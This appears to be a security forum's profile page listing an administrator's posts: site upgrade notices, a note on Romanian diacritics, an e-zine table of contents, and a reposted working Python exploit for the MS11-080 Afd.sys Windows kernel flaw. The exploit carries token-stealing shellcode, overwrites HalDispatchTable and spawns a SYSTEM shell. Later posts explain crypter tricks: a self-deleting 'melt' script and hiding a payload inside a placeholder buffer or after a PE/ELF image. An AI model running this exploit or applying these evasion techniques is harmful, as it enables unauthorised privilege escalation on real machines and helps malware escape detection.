Nytro

Administrators
  • Posts

    18735
  • Joined

  • Last visited

  • Days Won

    710

Everything posted by Nytro

  1. Done, I had forgotten about that.
  2. We will still tweak the theme colours and fix the small problems that come up. @Anonimul: Yes, I changed a lot of things, but everything is ok; it's just that vbSEO probably builds a cache, which is why it takes a few minutes until certain links become active. In other words, it worked afterwards without me doing anything.
  3. GNY Zine, Issue #6

    Go Null Yourself E-Zine
    Issue #6 - Fall/November 2011
    www.GoNullYourself.org

    0x01 Introduction
    0x02 Editorials
    0x03 Floating Point Numbers Suck - dan
    0x04 duper's Code Corner - duper
    0x05 How Skynet Works: An Intro to Neural Networks - elchupathingy
    0x06 Defeating NX/DEP With return-to-libc and ROP - storm
    0x07 A New Kind of Google Mining - Shadytel, Inc
    0x08 Stupid Shell Tricks - teh crew
    0x09 An Introduction to Number Theory - dan
    0x0a Information Security Careers Cheatsheet - Dan Guido
    0x0b Interview with Dan Rosenberg (bliss) - teh crew
    0x0c Et Cetera, Etc. - teh crew

    Download: http://www.exploit-db.com/papers/18168/
  4. A stupid problem with the pagination, let me see what's wrong with it... It seems there are temporary problems with the URL rewrite, but after a few minutes everything is ok.
  5. MS11-080 Afd.sys Privilege Escalation Exploit

    ```python
    ################################################################################
    ######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
    ######### Author: ryujin@offsec.com - Matteo Memelli                    ########
    ######### Spaghetti & Pwnsauce                                          ########
    ######### yuck! 0xbaadf00d Elwood@mac&cheese.com                        ########
    #########                                                               ########
    ######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin            ########
    ######### for helping out!                                              ########
    #########                                                               ########
    ######### To my Master Shifu muts:                                      ########
    ######### "So that's it, I just need inner peace?"                      ########
    #########                                                               ########
    ######### Exploit tested on the following 32bits systems:               ########
    ######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng             ########
    ################################################################################

    from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
                        c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
                        c_void_p, c_long, c_char_p)
    from ctypes.wintypes import HANDLE, DWORD
    import socket, time, os, struct, sys
    from optparse import OptionParser

    usage = "%prog -O TARGET_OS"
    parser = OptionParser(usage=usage)
    parser.add_option("-O", "--target-os", type="string",
                      action="store", dest="target_os",
                      help="Target OS. Accepted values: XP, 2K3")
    (options, args) = parser.parse_args()
    OS = options.target_os
    if not OS or OS.upper() not in ['XP', '2K3']:
        parser.print_help()
        sys.exit()
    OS = OS.upper()

    kernel32 = windll.kernel32
    ntdll = windll.ntdll
    Psapi = windll.Psapi

    def findSysBase(drvname=None):
        ARRAY_SIZE = 1024
        myarray = c_ulong * ARRAY_SIZE
        lpImageBase = myarray()
        cb = c_int(1024)
        lpcbNeeded = c_long()
        drivername_size = c_long()
        drivername_size.value = 48
        Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
        for baseaddy in lpImageBase:
            drivername = c_char_p("\x00" * drivername_size.value)
            if baseaddy:
                Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
                                               drivername_size.value)
                if drvname:
                    if drivername.value.lower() == drvname:
                        print "[+] Retrieving %s info..." % drvname
                        print "[+] %s base address: %s" % (drvname, hex(baseaddy))
                        return baseaddy
                else:
                    if drivername.value.lower().find("krnl") != -1:
                        print "[+] Retrieving Kernel info..."
                        print "[+] Kernel version:", drivername.value
                        print "[+] Kernel base address: %s" % hex(baseaddy)
                        return (baseaddy, drivername.value)
        return None

    print "[>] MS11-080 Privilege Escalation Exploit"
    print "[>] Matteo Memelli - ryujin@offsec.com"
    print "[>] Release Date 28/11/2011"

    WSAGetLastError = windll.Ws2_32.WSAGetLastError
    WSAGetLastError.argtypes = ()
    WSAGetLastError.restype = c_int
    SOCKET = c_int
    WSASocket = windll.Ws2_32.WSASocketA
    WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
    WSASocket.restype = SOCKET
    closesocket = windll.Ws2_32.closesocket
    closesocket.argtypes = (SOCKET,)
    closesocket.restype = c_int
    connect = windll.Ws2_32.connect
    connect.argtypes = (SOCKET, c_void_p, c_int)
    connect.restype = c_int

    class sockaddr_in(Structure):
        _fields_ = [
            ("sin_family", c_short),
            ("sin_port", c_ushort),
            ("sin_addr", c_ulong),
            ("sin_zero", c_char * 8),
        ]

    ## Create our deviceiocontrol socket handle
    client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
                       None, 0, 0)
    if client == ~0:
        raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
    try:
        addr = sockaddr_in()
        addr.sin_family = socket.AF_INET
        addr.sin_port = socket.htons(4455)
        addr.sin_addr = socket.htonl(0x7f000001)  # 127.0.0.1
        ## We need to connect to a closed port, socket state must be CONNECTING
        connect(client, byref(addr), sizeof(addr))
    except:
        closesocket(client)
        raise

    baseadd = c_int(0x1001)
    MEMRES = (0x1000 | 0x2000)
    PAGEEXE = 0x00000040
    Zerobits = c_int(0)
    RegionSize = c_int(0x1000)
    written = c_int(0)
    ## This will trigger the path to AfdRestartJoin
    irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
                "\x00\x00\x00\x00\x44\x44\x44\x44"
                "\x01\x00\x00\x00"
                "\xe8\x00" + "4" + "\xf0\x00" + "\x45" * 231)
    ## Allocate space for the input buffer
    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0,
                                             byref(RegionSize), MEMRES, PAGEEXE)
    # Copy input buffer to it
    kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
    startPage = c_int(0x00020000)
    kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))

    ################################# KERNEL INFO ##################################
    lpDriver = c_char_p()
    lpPath = c_char_p()
    lpDrvAddress = c_long()
    (krnlbase, kernelver) = findSysBase()
    hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
    HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    HalDispatchTable -= hKernel
    HalDispatchTable += krnlbase
    print "[+] HalDispatchTable address:", hex(HalDispatchTable)
    halbase = findSysBase("hal.dll")
    ## WinXP SP3
    if OS == "XP":
        HaliQuerySystemInformation = halbase + 0x16bba  # Offset for XPSP3
        HalpSetSystemInformation = halbase + 0x19436    # Offset for XPSP3
    ## Win2k3 SP2
    else:
        HaliQuerySystemInformation = halbase + 0x1fa1e  # Offset for WIN2K3
        HalpSetSystemInformation = halbase + 0x21c60    # Offset for WIN2K3
    print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
    print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)

    ################################# EXPLOITATION #################################
    shellcode_address_dep = 0x0002071e
    shellcode_address_nodep = 0x000207b8
    padding = "\x90" * 2
    HalDispatchTable0x4 = HalDispatchTable + 0x4
    HalDispatchTable0x8 = HalDispatchTable + 0x8
    ## tokenbkaddr = 0x00020900
    if OS == "XP":
        _KPROCESS = "\x44"
        _TOKEN = "\xc8"
        _UPID = "\x84"
        _APLINKS = "\x88"
    else:
        _KPROCESS = "\x38"
        _TOKEN = "\xd8"
        _UPID = "\x94"
        _APLINKS = "\x98"

    restore_ptrs = "\x31\xc0" + \
                   "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                   "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                   "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                   "\xa3" + struct.pack("L", HalDispatchTable0x4)

    tokenstealing = "\x52" + \
                    "\x53" + \
                    "\x33\xc0" + \
                    "\x64\x8b\x80\x24\x01\x00\x00" + \
                    "\x8b\x40" + _KPROCESS + \
                    "\x8b\xc8" + \
                    "\x8b\x98" + _TOKEN + "\x00\x00\x00" + \
                    "\x89\x1d\x00\x09\x02\x00" + \
                    "\x8b\x80" + _APLINKS + "\x00\x00\x00" + \
                    "\x81\xe8" + _APLINKS + "\x00\x00\x00" + \
                    "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" + \
                    "\x75\xe8" + \
                    "\x8b\x90" + _TOKEN + "\x00\x00\x00" + \
                    "\x8b\xc1" + \
                    "\x89\x90" + _TOKEN + "\x00\x00\x00" + \
                    "\x5b" + \
                    "\x5a" + \
                    "\xc2\x10"

    restore_token = "\x52" + \
                    "\x33\xc0" + \
                    "\x64\x8b\x80\x24\x01\x00\x00" + \
                    "\x8b\x40" + _KPROCESS + \
                    "\x8b\x15\x00\x09\x02\x00" + \
                    "\x89\x90" + _TOKEN + "\x00\x00\x00" + \
                    "\x5a" + \
                    "\xc2\x10"

    shellcode = padding + restore_ptrs + tokenstealing
    shellcode_size = len(shellcode)
    orig_size = shellcode_size
    # Write shellcode in userspace (dep)
    kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                shellcode_size, byref(written))
    # Write shellcode in userspace (nodep)
    kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                shellcode_size, byref(written))

    ## Trigger Pointer Overwrite
    print "[*] Triggering AFDJoinLeaf pointer overwrite..."
    IOCTL = 0x000120bb  # AFDJoinLeaf
    inputbuffer = 0x1004
    inputbuffer_size = 0x108
    outputbuffer_size = 0x0  # Bypass Probe for Write
    outputbuffer = HalDispatchTable0x4 + 0x1  # HalDispatchTable+0x4+1
    IoStatusBlock = c_ulong()
    NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None,
                                           byref(IoStatusBlock), IOCTL,
                                           inputbuffer, inputbuffer_size,
                                           outputbuffer, outputbuffer_size)
    ## Trigger shellcode
    inp = c_ulong()
    out = c_ulong()
    inp = 0x1337
    hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
    ## Spawn a system shell, w00t!
    print "[*] Spawning a SYSTEM shell..."
    os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

    ############################## POST EXPLOITATION ###############################
    print "[*] Restoring token..."
    ## Restore the thingie
    shellcode = padding + restore_ptrs + restore_token
    shellcode_size = len(shellcode)
    trail_padding = (orig_size - shellcode_size) * "\x00"
    shellcode += trail_padding
    shellcode_size += (orig_size - shellcode_size)
    ## Write restore shellcode in userspace (dep)
    kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                shellcode_size, byref(written))
    ## Write restore shellcode in userspace (nodep)
    kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                shellcode_size, byref(written))
    ## Overwrite HalDispatchTable once again
    NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None,
                                           byref(IoStatusBlock), IOCTL,
                                           inputbuffer, inputbuffer_size,
                                           outputbuffer, outputbuffer_size)
    ## Trigger restore shellcode
    hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
    print "[+] Restore done! Have a nice day :)"
    ```

    Source: http://www.exploit-db.com/exploits/18176/
  6. Nytro

    From 0

    dfgdfgdgdf
  7. Update: I have brought the links back to their original form, like "44039-rst-upgrade-2.rst". Problems may appear; I checked most of it and it seems ok, but if something is not right, if invalid links show up, please let me know. PS: Some links were of the form "44039-rst-upgrade-2-post-1337.html"; they now appear with ".rst", and you will be redirected from such an "html" link. I hope no problems come up.
  8. We will take care of the homepage too, as time allows.
  9. Nytro

    An annoying bug

    As for the theme, I hope we will sort it out in a few days. Does anyone else have this problem with the 10 characters when writing a valid message, that is, one that isn't just a "quote", for example?
  10. If you had searched a little you would have found this: http://en.wikipedia.org/wiki/Features_new_to_Windows_7 If you want to go into detail: http://channel9.msdn.com/Shows/Going+Deep/Mark-Russinovich-Inside-Windows-7 Some technical details: http://www.slideshare.net/msigeek/windows-7-ver-4
  11. Thanks for the feedback. Yes, the main problems are:
    - a new, "unique" theme like the old one; beyond that there is nothing we can do, you are all different, you have different tastes, there is no way to please everyone, but I think we will keep those themes, maybe tweak them a bit, and it should be ok for everybody
    - rewriting the links and bringing them back to the old form
    That's about what we have to do for the moment; let's hope we solve the links problem today.
  12. RST Upgrade

    I made some changes this evening: I updated the forum and made a few more minor changes. The main problem that needed fixing was the special characters, the diacritics, which should now be resolved. Quite a few problems may appear; some I am aware of, some not yet. If you find a problem, please post here or send me a PM. The themes have only been installed, we haven't had time to modify them, but they are problematic, both in terms of colours and because some images are missing. My advice is to use the Default theme for a few days, then we will fix this problem too. We will be working these days and more changes will follow, so we also welcome suggestions.
  13. Nytro

    From 0

    • Ă ă: breve (căciulă); when the mark is placed above a letter representing a vowel to indicate a short pronunciation (for example a semivowel), it is called the short sign.
    • Â â Î î: circumflex; in other languages the phonetic value of this diacritic is different.
    • Ș ș Ț ț: comma below (virguliță)[2] or virgulă, placed under the corresponding letters s, S, t, T. The variants with cedilla are very widespread, especially in computer typesetting, but incorrect (see the articles Ș, Ț).
    • Ç ç Ş ş: cedilla; used for example in French, Albanian and Turkish. Its appearance differs from that of the comma below used in the Romanian letters ș and ț.
    • Ñ ñ Ã ã: tilde; used for example in Spanish and Portuguese, or in the International Phonetic Alphabet.
    • Č č Š š: háček; used for example in Czech, Slovak, Serbian, Croatian etc.
    • Ä ä Ö ö: diaeresis (tremă) or umlaut; used for example in Finnish, Swedish, German, French and Turkish.
    • È è Ò ò: grave accent; used for example in French and Italian.
    • É é Á á: acute accent; used for example in French and Hungarian. In Romanian it is sometimes used on headwords in dictionaries, or to mark the stress in words that would otherwise be confused, for example: (doi) copíi is different from (două) cópii.
  14. Nytro

    From 0

    From 0x90 to 0x4c454554, a journey into exploitation
  15. Nytro

    From 0

    From 0
  16. Nytro

    An annoying bug

    Be patient for a day or two... We'll fix it.
  17. I know, but I haven't had time; these days we're getting rid of all the problems. You copy the post, click Edit and then Save. It works that way, but not in all cases.
  18. Nytro

    An annoying bug

    Either you write too much, or too little.
  19. Ugh, I don't even want to look at the code again, it's all thrown together, I have sequences where I close 7-8 braces in one place... Yes, I was just starting out. I'm not a fan of frameworks; I haven't worked on it since, I moved on to C/C++ and other things and haven't had the time.
  20. Nytro

    Y!Disruption

    Let's be serious, think about it: how many of you have changed someone's statuses? Quite a few...
  21. No need, there are a few commands, the most important being "del" or "rm". For the auto-updater it's a different principle. You check somewhere on the web for the latest version, download it, and make an "installer" for that update. That is, you write another small program/script that copies the files from a temporary folder into your application's folder, replacing the application (which is stopped) and the other needed files, then restarts the application. The application just runs that installer and exits.
  22. Topics created: http://rstcenter.com/forum/search.php?do=finduser&u=35218&starteronly=1 Permanent ban.
  23. Nytro

    Y!Disruption

    Yes, you said it. That's why I moved the topic to VIP: because I didn't want it to end up in everyone's hands. The people at Yahoo! move slowly, and we are going to be a country full of kids with no future who, on top of being stupid, show it too.
  24. In crypters a silly thing called "Melt" is used. It's not exactly optimal, but it does the job:
    1. The executable creates a .bat/.sh file containing a loop that checks whether a file (the executable's location) exists
    2. If it exists, it tries to delete it; if not, it goes back into the loop
    3. The executable creates this file, runs it and stops (the process)
    4. The script deletes the executable after it stops, then deletes itself (not mandatory, it can be created in Temp or /tmp, but it's practical)
    Is that what you want to do?
  25. As for resources, you need to know the PE and ELF formats well, and that's nasty. The simplest would be like this:
    - you declare a variable x = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    - that variable holds, I don't know, 300KB of 'A'
    - it is saved in a certain (data) section of the executable at compile time
    - with another program, you search the compiled executable for this "AAAAAAAAAAA"
    - you put another file there, whatever you want to put
    - from your program you do whatever you want with that variable; since you put another file there, you just have to write the data from that variable wherever you want
    - you have to be careful with the size of the file or whatever you put there, so you know where to stop
    - you can use a certain string, like "HO_BA", so you know that's where the data you overwrote into that "AAA" string with another program/hex editor ends
    Another idea is to write that "extra" data right after the program's last byte.
    - take care to find correctly where to read from: either you determine the size of the executable "image", or, as above, you use a delimiter
    - you can realign the executable's structure so that it stays valid
    - the principle holds for both PE and ELF
    I think you understand what I mean.